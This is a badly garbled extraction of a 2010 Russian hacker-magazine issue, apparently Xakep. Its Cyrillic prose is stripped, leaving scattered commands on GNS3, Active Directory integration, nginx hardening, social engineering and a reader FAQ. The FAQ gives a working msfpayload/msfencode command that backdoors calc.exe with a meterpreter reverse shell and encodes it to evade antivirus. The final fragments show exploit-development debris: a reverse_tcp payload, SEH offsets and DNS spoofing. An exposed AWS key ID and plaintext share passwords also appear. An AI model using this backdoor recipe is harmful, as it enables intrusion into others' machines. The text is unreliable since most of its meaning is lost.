Dynamips, Dynagen Qemu.
Wireshark (wireshark.org).
Cisco IOS, GNS3 olive- JunOS (juniper.net/ru/ru/products-services/nos/
junos) ,
Juniper Networks.
Ethernet, ATM Frame Relay (ASA, PIX).
Dynamips,
.

.
GNS3 Linux. Debian/Ubuntu
:
$ sudo apt-get install gns3
, gpl.code.de.
X 07 /138/ 10
GNS3
gpl.code.de/oswiki/
GplcodedeApt. Python : Qt, PyQt .
Setup Wizard,
:
Dynamips . IOS-.
. "Nodes
Types" , ,
. , ,
, , .
, , IDLE
PC, .
( , , ). , ,
, (,
..) Edit Symbol Manager.
Topology Summary
, ( ). , , GNS3 ,
.
IOS-
Dynamips, Edit IOS images and
hypervisors. image-, ,
RAM .
,
. IDLE PC
( ).
Dynagen,
.
, ,
Add a link. .
, Dynagui
(dynagui.sf.net),
.
GNS3, 2007 .

, , Cisco
Systems Juniper Networks
.z
INFO
info

Packet
Tracert

.
Packet Tracert
,

. , ,

.
HTTP://WWW
links

Dynagen dynagen.
org

Dynamips Dynagen
blindhog.net
IOS
Cisco
tools.cisco.com/ITDIT/
CFN/Dispatch
GNS3
gpl.code.de/oswiki/
GplcodedeApt

Wireshark
wireshark.org
IOS
: www.opennet.ru/
docs/RUS/cisco_basic
123
SYN/ACK
grinder grinder@synack.ru, urban.prankster martin@synack.ru

WINDOWS *NIX
- :
Windows- *nix-
, .
, , , .
, Windows *nix- .

,
,
,
,
.
.
,
,
. (single sign-on, SSO),

.

: , - ..
,

(, Active Directory),

.
*nix-, , ,
. Samba
(winbind) Kerberos. AD
,

OpenSource- (, Squid).
Samba-
.
LDAP--
124
. ,

LDAP-
AD.
OpenSource-,

.
*nix-.
][,
, ,
, Windows-.

UNIX
Microsoft
,
. .
( Win2k3R2)

UNIX (Microsoft Server for NIS, AD Identity
Management for Unix), .
Win2k8
. ,
PowerShell:
PS> Import-Module Servermanager
PS> Add-WindowsFeature ADDSIdentity-Mgmt -restart
Windows ,
.
AD
, MS
,
. ,
NIS (Network Information Service)
, AD, , .

Windows *nix. AD *nix' UID GID.

, NIS

(, ).
SCOM 2007
,
Microsoft. System Center ( SCCM 2007
,
][ 08.2009) System Center Operations
Manager 2007 (OpsMgr 2007, microsoft.com/
systemcenter/en/us/operations-manager.
aspx) , ,
.
IT-, .
OpsMgr 2007
MS, 2008 Cross Platform Extensions
(blogs.msdn.com/SCXplat),
X 07 /138/ 10
,
Linux x86/x64 ( RedHat, SUSE), HP-UX,
AIX Solaris SPARC/x86. CPE : Web Services for Management (WS_Management),
OpenPegasus SSH. . , SSH
. OpsMgr, *nix-
.
, TechNet (technet.microsoft.com/
en-us/systemcenter/scx/default.aspx).
*nix-
OpsMgr
(Apache, MySQL, syslog),
: , , CPU. OpsMgr
Computer and Device Management Wizard - Unix/Linux Discovery
Wizard , .
scx-cimd
scx-wsmand,
.
.

, Windows. *nix + , , ( ,
).
AD, ,
. , *nix
UID GID
,
. ,
, .
, .
, -.
LIKEWISE OPEN
: LIKEWISE SOFTWARE
WEB: LIKEWISE.COM, LIKEWISEOPEN.ORG
: LINUX 2.4/2.6 (X86/X64) RPM&DEB BASED, FREEBSD X86, SOLARIS 8+
(X86/X64, SPARC), OS X 10.4+, HP-UX PA-RISC/IA64, AIX

.
: Centrify DirectControl/Centrify DirectManage, Likewise
Enterprise/Likewise Open, Quest Authentication Services ( Vintela
Authentication Services) Quest One Identity Solution. *nix
Active Directory.
, , ,
. ,
- *nix-, . *nix
Windows
, AD.
, ,
X 07 /138/ 10
: (Open)
(Enterprise). ,
, SSO-
Kerberos 5 NTLM. .
LO . .
,
. (,
, OpenSSH Putty). AD
, .
180 .
, Enterprise, -
125
SYN/ACK
Likewise Open
Likewise
Open
*nix- AD,
AD *nix-,

Gnome GConf, SELinux,

AppArmor sudo,
.
AD,
UID-GID (Likewise
Management Console),
. , Enterprise
,
Windows QAS

.
.
LO , , Red Hat
Enterprise Linux/Fedora/CentOS, Ubuntu,
openSUSE. Ubuntu :
$ sudo apt-get install likewise-open
likewise-open-gui

Win2k8R2 *nix
Windows
*nix .
: SMB NFS. Windows,
*nix. FTP, HTTP, SSH
.. . Linux
, SMBFS CIFS, smbclient. Ubuntu
SMBFS, CentOS CIFS.
:
$ smbclient -L winsystem
*nix (Konqueror,
Nautilus) smb://
winsystem/.
, /
etc/fstab:
//winsystem/share /mnt/win cifs user,uid=500,rw,suid,usern
ame=user,password=pass 0 0
, , autofs. /etc/
auto.master :
winsystem -fstype=cifs,rw,noperm,username=user,password
=pass ://winsystem/share
service autofs restart.
*nix SMB Samba (www.samba.org). /etc/
smb.conf, ,

(Nautilus, Konqueror, smb4k, XSMBrowser).
Win2k3R2, Microsoft
Services for Network File System (
Windows Services for Unix). Win2k8
File Server.
NFS- . NFS- :
> Servermanagercmd install FS-NFS-services

NFS Sharing, .
NFS *nix (, . www.openbsd.
ru/docs/steps/nfs.html). /etc/exports
Windows
:
> mount \\192.168.1.12\share Z:
/smbmount /etc/auto.smb
/etc/auto.smb :
126
showmount -e IP_server .
X 07 /138/ 10
WARNING
warning

*nix
AD, *nix
DNS NTP

.
QAS
, RPM DEB. , Ubuntu

:
$ sudo chmod +x ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh
$ sudo sh ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh
GUI:
$ sudo chmod +x ./LikewiseDomainJoinGui5.3.0.7766-linux-x86_64-deb-installer
$ sudo sh ./LikewiseDomainJoinGui-5.3.0.7766linux-x86_64-deb-installer
.
,
LO- ,
. *nix-
: lsassd (),
netlogond ( ), dcerpcd (RPC), lwiod (
SMB) eventlogd ( ).
OU, : *nix-, ( primary)
.
:
$ /opt/likewise/bin/domainjoin-cli join
synack.ru admin
'--preview' ,
.
;
,
DOMAIN\\username.
QUEST AUTHENTICATION SERVICES

: QUEST SOFTWARE
WEB: QUEST-SOFTWARE.RU
: LINUX X86/X64, SOLARIS X86/X64/SPARC, AIX, HP-UX,
MAC OS X, HP-UX IA64/PA-RISC, IBM AIX X86/X64, SGI IRIX,
TRU64, XENSERVER, VMWARE ESX SERVER
QAS , AD, *nix-

. X 07 /138/ 10
Windows
Linux
, GPO, SSO- -Windows , Kerberos LDAP.
QAS
ARC4 128- , ,
56- DES,
Kerberos.
QAS *nix
/
, -.
AD,
, , , ,
. ,
.
NIS- NIS AD. ISO- (
).
, install.sh
preflight.sh .
QAS
.
*nix .
RPM/DEB client, SDK .

. vasd
,
. vasd vastool.
Windows
,
. ,
Win2k3R2, AD,
Unix- (UID, GID,
, ),
Schema Wizard,
Schema.

, .
: *nix-
OU.
INFO
info
SCCM 2007

, ][ 08.2009.
HTTP://WWW
links

Microsoft System
Center Operations
Manager 2007 :
microsoft.com/
systemcenter/en/us/
operations-manager.
aspx
OpsMgr 2007
Cross Platform
Extensions: blogs.
msdn.com/SCXplat,
technet.microsoft.com/
en-us/systemcenter/
scx/default.aspx
NFS
Linux: linux-nfs.org
127
SYN/ACK
NFS Win2k8R2
CENTRIFY DIRECTCONTROL
: CENTRIFY CORPORATION
WEB: CENTRIFY.COM
: LINUX X86/X64, MAC OS X, SOLARIS/
OPENSOLARIS X86/X64/SPARC, IBM AIX, SGI IRIX,
HP-UX, VMWARE ESX SERVER
Centrify DirectControl *nix ,

. ,

,
AD.
, .

,
225 ; centrify.com/
directcontrol.
Centrify DirectManage
Windows -. ,
Active Directory
Centrify Profile,
128
,
: , , UID,
. DirectControl ,

,

. . ,

.
. (
)
,
.
.
, , ,

.
,
.
.
*nix- , , .
DirectControl
,
GPO. *nix, Windows
, .
( , *nix-, primary-
..) ,
*nix-
AD, .
, Windows *nix
,
, ,
.
,

. z
X 07 /138/ 10
j1m@synack.ru

NGINX WEB-
Web- nginx Web-. :

. , Apache, nginx
Web-, nginx
.
, , , nginx. ,
Web- .

,
, , -
Web-.
nginx
. ,
,
,
Web-, -.

Web-
nginx, src/
http/ngx_http_header_filter_module.c
:
static char ngx_http_server_
string[] = "Server: nginx" CRLF;
static char ngx_http_server_full_
string[] = "Server: " NGINX_VER
CRLF;
- :
static char ngx_http_server_
string[] = "Server: ][ Web Server"
X 07 /138/ 10
CRLF;
static char ngx_http_server_full_
string[] = "Server: ][ Web Server"
CRLF;

nginx-
nginx
Web- ,

. ,
,
.
,
.

:
# ./configure --without-http_
autoindex_module --without-http_
ssi_module
# make
# make install
nginx ( ) SSI (Server Side Includes)

Autoindex. ,
Web-,
configure '--help'.
NGINX.CONF
nginx .
, , -

nginx.conf "server_tokens
off". nginx
Web- , .

server :
# vi /etc/nginx/nginx.conf
#

client_body_buffer_size 1K;
#

client_header_buffer_size 1k;
#
, ContentLength .
,

client_max_body_size 1k;
#

large_client_header_buffers 2 1k;
large_client_
header_buffers. ,
URI nginx ,

129
SYN/ACK
( x86 4 ).
, keep-alive. 1 URI
2 , DoS-.
:
#
client_body_timeout 10;
#
client_header_timeout 10;
# , keep-alive

keepalive_timeout
5 5;
#
send_timeout
10;

Web- DoS :
# (slimits),
. 1
32000 , 5
limit_zone slimits $binary_remote_addr 5m;
# . , IP
limit_conn slimits 5;
HTTP, location. ,
Service unavailable 503.
130

Web-.
IP- 80
HEAD - ( ). ,
IP- ( location):
if ($host !~ ^(host.com|www.host.com)$ ) {
return 444;
}

Web-

/ ,
RFC 2616 , Web- , . GET (
), HEAD ( ) POST (
),
server
:
if ($request_method !~ ^(GET|HEAD|POST)$ ) {
return 444;
}

,
(user-agent). ,
, :
X 07 /138/ 10
nginx
FreeBSD ,
return 403;
}
}
nginx
#
if ($http_user_agent ~*
LWP::Simple|BBBike|wget) {
return 403;
}
#
if ($http_user_agent ~*
msnbot|scrapbot) {
return 403;
}
Referrer-
Web- ,
Referrer- ( -
, referrer
).
SEO-
-,
.

, , .
# server
if ( $http_referer ~* (babes|forsale
|girl|jewelry|love|nudit|organic|p
oker|porn|sex|teen) )
{
return 403;
}

( ) .
, , ,
,
,
Web-, .
,
,
, ( ,
referrer-
). server nginx.conf
(host.com ):
location /images/ {
valid_referers none blocked www.
host.com host.com;
if ($invalid_referer) {
Nginx Web- .
Netcraft, 12
Web- , Rambler, Yandex,
Begun, Wordpress.com, Wrike, SourceForge.net, vkontakte.ru, megashara.com, Taba.ru. ,
select, epoll (Linux), kqueue (FreeBSD)
( 1
16 ), nginx , 10000 (
C10K). Rambler
2004 BSD- .
X 07 /138/ 10

.
return 403 :
rewrite ^/images/uploads.*\.
(gif|jpg|jpeg|png)$ http://www.
host.com/banned.jpg last
Web-, nginx
IP- .

. ,
URI :
location /uploads/ {
#

allow 192.168.1.0/24;
#
deny all;
}
uploads

.
.
nginx-
(
admin):
# mkdir /etc/nginx/.htpasswd
# htpasswd -c /etc/nginx/.htpasswd/
passwd admin
nginx.conf
:
location /admin/ {
auth_basic "Restricted";
131
SYN/ACK
nginx Ubuntu
auth_basic_user_file /etc/nginx/.htpasswd/passwd;
PHP
:
# htpasswd -s /etc/nginx/.htpasswd/passwd
SSL
,
, , ,
, . Nginx
SSL, .
SSL- nginx
. :
#
#
#
#
#
#
cd /etc/nginx
openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr
cp server.key server.key.org
openssl rsa -in server.key.org -out server.key
openssl x509 -req -days 365 -in server.csr \
-signkey server.key -out server.crt
nginx:
server {
server_name host.com;
listen 443;
ssl on;
ssl_certificate /etc/nginx/server.crt;
ssl_certificate_key /etc/nginx/server.key;
access_log /etc/nginx/logs/ssl.access.log;
error_log /etc/nginx/logs/ssl.error.log;
}
Web-:
# /etc/init.d/nginx reload
, Web-
. :
. /etc/sysctl.conf
:
# vi /etc/sysctl.conf
# smurf-
132
net.ipv4.icmp_echo_ignore_broadcasts = 1
# ICMP-
net.ipv4.icmp_ignore_bogus_error_responses = 1
# SYN-
net.ipv4.tcp_syncookies = 1
#
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
#
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
#
net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# ExecShield
kernel.exec-shield = 1
kernel.randomize_va_space = 1
#
net.ipv4.ip_local_port_range = 2000 65000
# TCP-
net.ipv4.tcp_rmem = 4096 87380 8388608
net.ipv4.tcp_wmem = 4096 87380 8388608
net.core.rmem_max = 8388608
net.core.wmem_max = 8388608
net.core.netdev_max_backlog = 5000
net.ipv4.tcp_window_scaling = 1

Web-
Web-
, ,
Web-. /etc/
fstab :
/dev/sda5 /nginx ext4 defaults,nosuid,noexec,nodev 1 2
nginx chroot/jail-
*nix-
. Linux KVM, Xen, OpenVZ VServer, FreeBSD Jail, Solaris
Zones. ,
nginx chroot,
, .
X 07 /138/ 10
# vi /etc/pf.conf
webserver_ip="1.1.1.1"
table <abuse> persist
block in quick from <abuse>
pass in on $ext_if proto tcp to $webserver_ip \
port www flags S/SA keep state \
(max-src-conn 100, max-src-conn-rate 15/60, \
overload <abusive_ips> flush)

(15 ) 100.
PHP
nginx PHP, .
/etc/php/php.ini
:

SELinux nginx

,
SELinux AppArmor. , Web-.
nginx,
SELinuxNginx (http://sf.net/projects/selinuxnginx/) SELinux, .
#
#
#
#
tar -zxvf se-ngix_1_0_10.tar.gz

cd se-ngix_1_0_10/nginx
make
/usr/sbin/semodule -i nginx.pp

nginx ,
,
, .
, ,
80, 110 143- (, , nginx
IMAP/POP3-).

Web- IP- .
DoS- . Linux
iptables/netfilter- state:
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --set
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --update \
--seconds 60 --hitcount 15 -j DROP
IP 15. pf:
X 07 /138/ 10
# vi /etc/php/php.ini
#
disable_functions = phpinfo, system, mail, exec
#
max_execution_time = 30
# ,

max_input_time = 60
# ,
memory_limit = 8M
# , POST
post_max_size = 8M
#
upload_max_filesize = 2M
# PHP-
display_errors = Off
# Safe Mode
safe_mode = On
# SQL Safe Mode
sql.safe_mode = On
#
safe_mode_exec_dir = ////
# PHP
expose_php = Off
#
log_errors = On
#
allow_url_fopen = Off
, Web-. ,
. ,
, , nginx ,
,
.
Web-, ,
. ,
Web-. z
133
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:
-, ,
, ,
,
e-mail, ICQ

,
, ,
.
.

: , ,
.
,
, .
.
: GoodGod

socialware.ru;
Ayumi (spylabs.org);
,
.
!
ICQ
( primary e-mail)
ICQ :

e-mail (
][ 2009 , GoodGod);
ICQ, ;
ICQ, SEO
(
).
, , . -
134
: ,
, - .

, .
, () .
,
( , ,
). -
, ,
, :
,
200 .
,
. , ,
;
.
, ,
, , .
, - (
, ). ,
? ? , ... , . ,
.
ICQ Search, ,
(200
1400
).
,
.
,
. ,
: , , whois ,
( )
E-mail ICQ.
,
e-mail,
,
. ,
e-mail, UIN !
e-mail, ,
,
.

, ,
:
;
;
;
;
( ; ;
; ).
, , ,
.
,
,
.
X 07 /138/ 10
.
ICQ . -,
( )

.
,
, ,
.
?

,
. . :
, ,

. .
, ,
,
.
,
;
, ,
, .
, .
, .

, , , ,
.
,
,
.

,
,
, ,
.
X 07 /138/ 10

. ,
, , ( ,
),
,
( ).
. ,
.
,
. ,

. ,
( ) .
,
.
:
(: )
. : , (
)!
,

. , . , ( ).
5 ,
. ,
( ).
.
,
. ,
, , .
,

.
: 15-17 2010 ( )
100% ! ,
(). .
, . .
(). , 10
. ().

.
.
, (
), .
// HOSTS, DNS
DHCP- . , , e-mail,

, . ,

,
. ,
.
-,

.
, .
.

. .
135
UNITS
,

. ,
.
, ,

.
, (
:)).
+ .
3. .
-
, ,
,
.
, ,
.

.
-,
. ,
.
, ,
,
-
, .
,
:).
.
4. .
(-, )
,
. ,

, , ,
, .exe
3D.
1. .

, ,
, ,
( , !),
- SMS.
,
(
). ,

. + .
136
2. .
,

. , , ( , ).

, , ,
,
.exe
3D.
,
,
. : ,
, -
,

: ( ),
-. ,
/ (
), , ,
. !
.
5. -
.
- : ( ).
().
(12 ) .
e-mail:
X 07 /138/ 10
( ), e-mail,
, .
, , .

.
SHKOLNIK.RU
whois- e-mail,
. e-mail yandex.
ru, .

.

.
, .

HACKERSOFT.RU
, .
. ,
-. whois,
(mchost.ru) e-mail,
.
e-mail, : hackersoft.
ru@mail.ru,

, , , e-mail
. , , .
!
: ,

. , -
, , . , e-mail -
beta-testing@***.com. ,

.
.

. .
.

,
socialware.ru.
X 07 /138/ 10
137
UNITS
.
, e-mail
gmail.com.
-
hackersoft.ru@gmail.com. ,
.
.
, .
.

http://socialware.ru.
.

.
138
,
,
,
.
,
,
,
,
. :
, , .
( ) ,
: ,
,
WebMoney;
. ,
:
( ), ,
.

.
?
, , (
), , .

, ,
,
(
), ,
, , .

.
:
,
IT, ( Free Pascal
IDE); -108 (
);
, , :
(QIP,
VTalking), ICE Book Reader;
,
, :
Windows ( 2010 ),
;

(Alcohol, DVD Decrypter, Clone DVD, Nero)
+ Media Coder ;

(: .doc, .doc, );
WebStream,
.
WebStream 11 ,
;
: Opera, IE, FF; COMODO Internet
Security; Nokia.

()
,
, ,

.
, .
, ,
,
.
. , -
X 07 /138/ 10

(phishing, . fishing , ) -, ,
. , .
(farming . .
,
) DNS- HOSTS
.
( ,
,
):
1. ;
2. ;
3. .
- ().
,
. ,

().
, .

/, :).
. ,

: ,
-
..
.

: ,
, ,
,
.
,

,
. .
, (
),
: ,
, batch/VBScript/JScript-
. ,

,
.
,
ICQ,
, ,
.
-
,

. ,
- . ,
-IT.

,
.
( , ). ,
,
X 07 /138/ 10
(. ),
, ..
,
, ,
,
.
.
: , (
,
, ). , ,
,
( ).
, , .

,
. : 10-15 ?
.
, ,
,
. , ,
, -

.
, -
,
. ,
, ,
.
,
.
, , ,
,
.
,
. .
:
,
, .
,
.
,
, , .
, .
, , ,
.
, . , ,
,
,

.
,

:
1. .

,

.
2. ,
.
.
3. .
,
, .
(
).
4. .
.
.
,
.
.z
139
UNITS
ant

faq
united
@real.xakep.ru
Q: , ,
API-. MSDN,
. - IDA,
API-?
: , ,
API , ,
. ,
zynamics.com ida-msdn-
( : github.com/zynamics/msdnplugin-ida),
MSDN API , . ,
MSDN XML-.
msdncrawler (github.com/zynamics/msdn-crawler),
MSDN
XML- , API Windows (,
, ).
msdn-crawler
33984 (!) . msdn.xml,

IDB-, IDA.
IDAPython
ida_importer.py.
Q: Tor
. , , sslstrip, ,
.
- ?
140
A: 100% , -
. TorTunnel (www.
thoughtcrime.org/software/tortunnel)
TorScanner.

, ,
,
HTTPS HTTP:
torscanner host port / > dump.txt. ,

ExcludeNodes, Tor
.
, : , .
100% .
Q: SWF-
. ,
Flash.
A:
Flash-,
Flare OWASP's SWFIntruder.
,
,
, 9 10 Flashe,
ActionScript 3 Adobe Flex.
HP SWFScan (www.hp.com/go/swfscan).

, ActionScript 2.0
ActionScript 3.0.

Flash-. 60 ,
, XSS, (cross-domain privilege escalation)
. HP SWFScan ,
,
,

.
Q: -
Firefox Opera Chrome?
A:
Transmute (www.gettransmute.com),
-
. ,
(Firefox, Google Chrome, Opera, Internet Explorer
), -
. , Google Bookmarks, Delicious

.
Q: - JavaScript .
. ,
. ?
A: code.
replace(/\/\*.+?\*\/|\/\/.*(?=[\n\r])/g, '').
, ,
:
X 07 /138/ 10
Q:
?
A: ! ,
Gmail, ,
, Undo,
. ,
,
5 20 .
Outlook,
Exchange-
,
.
Q: RFID. ,

,
- . , RFID-
,
check-in -. ,
, RFID--
Python Visual Studio

1. var str = " /* not a real comment */ ";
2. var regex = /\/*.*/;
,
.
Q: Backtrack

. ?
A: Asus
/etc/X11/xinit/xinitrc:
xrandr output HDMI-2 offxrandr
output VGA off
xrandr output HDMI-2 off
xrandr output VGA off

(Firefox/Chrome);
LSP (Layered Service Provider),

DLL-
Winsock API.
:
(, Super Bank)
,
,

.
. ,
?
A: ,
!
.
RFID- . , ,
, .
-
. ,
www.dealextreme.com,
,
NoName RFID $40.
, -
. ,
-
. -

.
Q: ,
(
, ,
-)?
A: ,
, - .
:
API- ( ,
WinInet API);
BHO (Browser Helper Object)
DLL-,
Internet Explorer ;
(
API- FindWindow);
COM (Component Object Model) / OLE
(Object Linking and Embedding) ;
X 07 /138/ 10
141
UNITS
Q: ,
Excel-
(*.XLS).
, Python. ?
A: .
, , Pyxlreader (pyxlreader.
sourceforge.net),
COM,
Excel (
).

Excel.
Q: , iPhone?
RFID- $52
, RFID-
Paralax (www.parallax.
com),
/USB .
(
RFID Card Reader) $39,99
. :
RFID- $0,99.
Wi-Fi (
).
,
(
).
Q: Visual Studio
Python?
Q: . MAC-,
, ,
.
,
(, IP-).
.
?
A: , ,
, ,
IP-, .
! GPS ,
.
,
Wi-Fi (MAC ESSID)
(
, Google. ).
,

, .

.
,

Prey (preyproject.com).
: Windows, Mac
Linux,
Android. Prey
URL, ,
.
,
142
A: .
IronPython (
Python .Net)

Python- Visual Studio 2010.
,
IDE Microsoft,
Python,
( C#)
IntelliSense
.
Q:
Windows-
.
A: , exe .
, , , ,
Metaspoit'.
msfencode,
Metasploit,
backconnect:
./msfpayload windows/meterpreter/
reverse_tcp LHOST=< ip> R | ./
msfencode -t exe -x calc.exe -k -o
calc_backdoor.exe -e x86/shikata_
ga_nai -c 5
exe-
,
.
A: iPhone
Mach-O.

IPA- zip-, , -.
,
, ,
JailBrake (
).
gdb/
iphonedbg. AppStore : Mach-O. ,
,
Objective-C.
Apple
Smalltalk. ,
.
(>80%)
objc_msgSend().
,

zynamics Objective-C
helper (github.com/zynamics/objc-helperplugin-ida), IDA Pro
.
Q:
A-GPS (Assisted GPS).
,
. ,
GPS ?
A: , Assisted GPS
,
GPS, . ,
,

.
, GPS- : A-GPS
. , A-GPS
, ,
.z
X 07 /138/ 10
>Multimedia
VideoInspector 2.2.4.123
>Misc
Prey 0.3.7
win7stack 0.80
GiMeSpace Free Edition 1.0.4.6
GetFoldersize 2.2.10
AllDup 3.0.2
RBTray 4.1
FLV Extract 1.6.0
Writespace 1.4
OnTopReplica 2.9.3
Ditto-cp 3.16.8
TeraCopy 2.12
Grow 2.0.3
PrintConductor 1.5
ViGlance OneStep V1
UltraSearch 1.3
1Password for Windows 1.0 beta
Clavier+ 10.6.1
PREDATOR 2.2.0
TouchFreeze 1.0.2
>System
Guru3D - Driver Sweeper
Explorer++ 1.1
Splunk 4.1.2
CrystalDiskMark 3.0.0d
LogLady 1.1
Sikuli IDE 0.10.1
RegFromApp 1.21
DOSBox 0.74
Soluto 1.0.721.0
VirtualBox 3.2 beta1
PC-Wizard 2010.1.94
Kiwi 1.4.2
FreeFileSync 3.7
HFSExplorer 0.21
>Net
FriendSea Presenter 1.2.0.6
NetSetMan 3.0.3
HomePipe
NetBalancer 1.0
TweetMyPC 3
Firewall Builder 4.0
inSSIDer
RFIDIOt 1.0a
Odysseus 2.0.0.84
Tinc 1.0.13
KpyM TelnetSSH Server 1.18b
USB to Ethernet 3.0.6
>Security
Webreak beta 0.1.1
MetaGooFil 1.4b
theHarvester 1.6
WebSlayer Beta
ProxyStrike 2.2
Sqlninja 0.2.5
Lansweeper 4.0
FUU 0.1beta
Malware Check Tool 1.0
Aircrack-ng 1.1
SIP Inspector 1.10
Blazentoo 0.1b
ThreatFactor NSIA
WhatWeb 0.4.3
Safe3 SQL Injector 6.2
ExploitMyUnion 2.1
iScanner 0.6
Yara 1.4
Harden SSLTLS beta
WebCruiser 2.3.2
FoxAnalysis 1.4.2
ChromeAnalysis 1.0.1
Watcher 1.4.0
Vera 0.1
Visual Studio
VisualSVN Server 2.1.2
VisualSVN 2.0.1
Visual Assist X 2010
TestDriven.NET 3.0 Personal
StyleCop 4.3.3.0
ReSharper 5.0
NUnit 2.5
GhostDoc 2.5
DPack 3.0.3 for Visual Studio 2010
CruiseControl.NET 1.5
CodeRush 2010.1.4
Visual Studio
Go To Definition 2.1
Triple Click 2.0
Hide Main Menu
ItalicCommentsFree 2.0
MoveToRegionVSX
Word Wrap with Auto-Indent 1.0
Regex Editor 1.5
GradientSelection 2.0
Selection Foreground 0.1
StructureAdornmentFree 1.9
Highlight all occurrences of selected
word 1.31
Find Results Highlighter 1.0
Visual Studio Background
Customizer 1.0
Visual Studio Color Theme Editor 1.0
IntelliSense Presenter 1.5
REAPER 3.52
mflow
RasterVect Free Edition 16.0
tinti 2.2.2
Taffy 0.5.0beta
VidCoder 0.41
Inkscape 0.47
Similarity 1.3
Free Audio Editor 2010
>>WINDOWS
>Development
Visual Studio 2010 Express
The Regex Coach 0.9.2
OllyDbg 2.0
Regulator 2.0
Regulazy 1.03
{smartassembly} 4.2
RJ TextEd 6.40
>System
ATI Catalyst 10.5
VMWare Workstation 7.1
XNeur+gXNeur 0.9.9
SystemRescueCd 1.5.4
Open vSwitch 1.0.0
VirtualBox 3.2.2
ZFS-Fuse 0.6.0
Linux Kernel 2.6.34
DOSBox 0.74
Ganeti 2.1.2
Memtest86+ 4.10
nVidia 195.36.24
YASMon 0.0.5
OpenAFS 1.4.12.1
ROXTerm 1.18.3
Wine 1.0.1
Wmc2d 2.03
>Games
The Battle for Wesnoth 1.8.2
>Net
Google Chrome 5.0.375.55
KTorrent 4.0
Midori 0.2.6
Pidgin 2.7.1
EiskaltDC++ 2.0.2
RTMPdump 2.2e
Mozilla Firefox 3.6.3
Dropbox 0.6.571
Mozilla Thunderbird 2.0.0.24
NetworkManager 0.8
Pino 0.2.10
Opera 10.10
gPodder 2.6
Konversation 1.2.3
GoldenPod 0.8.3
SIM IM 0.9.4.3
Xchat 2.8.8
>Security
LFT 3.1
Nufw 2.4.2
OpenScap 0.5.11
Suricata 0.9.1
Keychain 2.7.1
Whatweb 0.4.3
Joomla sqli sploiter
Column finder
Darkjumper 5.7
Iptables 1.4.8
Clamav 0.96.1
Metasploit Framework 3.4.0
Hashkill 0.2.0
Ctunnel 0.3
Graudit 1.6
Xplico 0.5.7
Sqlninja 0.2.5
iScanner 0.5
Complemento 0.7.6
Samhain 2.7.0
Authfail 1.1.7
Lightspark 0.4.0
>Server
Sipwitch 0.8.3
Cherokee Webserver 1.0.1
Adchpp 2.5
Kamailio 3.0.2
Radmind 1.13.0
Fapws3 0.5
Socks Server5 3.8.2
LFTP 4.0.8
RabbIT 4.6
Ziproxy 3.0.1
MySQL 5.1.47
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.3
DHCP 4.1.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Sendmail 8.14.4
Asterisk 1.6.2
>Devel
Akshell 0.2
Android NDK R4
Android SDK R6
Apache Rivet 2.0
Arcadia 0.8.1
Automake 1.11.1
Bviplus 0.9.4
db4o 8
Django 1.2
Execute Query 3.2.1
jMonkeyEngine3 SDK alpha
JRuby 1.5.0
Native Client SDK
Qt 4.6.2
Rubinius 1.0
Smalltalk 3.2
Spket IDE 1.6.18
xmlsec1 1.2.16
ADT 0.9.7
>>UNIX
>Desktop
Banshee 1.7.1
Cdrtools 3.0.0
DirSync Pro 1.3
DockBarX 0.39
Dynamic Window Manager 5.8
Emacs 23.2
Evince 2.30.1
FFmpeg 0.5.2
Fotoxx 10.4
F-Spot 0.6.2
KOffice 2.2
MC 4.7.2
MythTV 0.23
Parole 0.2.0.2
PeaZip 3.1
Sweet Home 3D 2.4
Xfce 4.6.2
Kaspersky CRYSTAL 9.0

ESET NOD32 4.2
07(138) 2010
LOTUS DOMINO
SKYPE
07 (138) 2010

: 2
10
.
. 107
. 52
. 26
. 110
AMAZON S3
WEB-
UNITS
HTTP:// WWW2

PASSWORDCARD
www.passwordcard.org PREZI
www.prezi.com
( b15DbaL) .
! , . ,
- ,
. . PasswordCard , -
. ,
.
-, ,
- , ,
.
, , ,
.
PasswordCard.
Microsoft , PowerPoint 2010 , . ,

- Prezi :). :
,

. ,
, , ,
, .
,
, ,
, , ,
:).

Javascript
JSCRAMBLER
RAPID7 ONLINE SCAN www.jscrambler.com

rapid7.com/freescan.jsp
Rapid7, , , Metasploit
. ,
Rapid7 NeXpose. ,
( ), ,
(--). ,
-
. ,
. , :

Reports.
144
Google I/O
: 2004
. , -
( Google).

, -, , , JavaScript, .
, ,
. , - JScrambler.
- , . , ,
.
X 07 /138/ 10

Хакер 2010 07 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 07 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

/ .: (495) 935-7034, : (495) 780-8824

2010 ANDROID OS 28% ,

IMAGINE CUP 2010

Matroska. , Google On2 ,

win RAR 3.9

win RAR 3.9 (OC)

wPrime 2.00 32m, c

ASRock H55M Pro

SuperPi 1.5 XS 1m, c

Everest memory read (OC)

Everest memory write

: INTEL H55 EXPRESS

: INTEL H55 EXPRESS

ASUS P7H55M Pro

: INTEL H55 EXPRESS

: INTEL H55 EXPRESS

5ASRock H55M Pro

: INTEL H55 EXPRESS

: INTEL H55 EXPRESS

Access Key ID Secret Access

Access Key ID: AKIAIEAXASBKAUVBX3DQ

Adobe Reader 9.2.0 ,

JABBER & PGP

lanmap eth0. lanmap.png. ,

DNS-spoofing. Metasploit fake dns, ,

nslookup digininja.reload 192.168.0.101

192.168.0.101 IP DNS, digininja.reload

set PAYLOAD windows/meterpreter/reverse_tcp

jmp, call, push+ret .. user32.dll j.txt.

. ESI 37694136, SEH 6B41316B.

ESI 260 , SEH 304.

=> 'tcp', Listen => '1' )

print $data "150 Here comes the directory listing.\r\n"

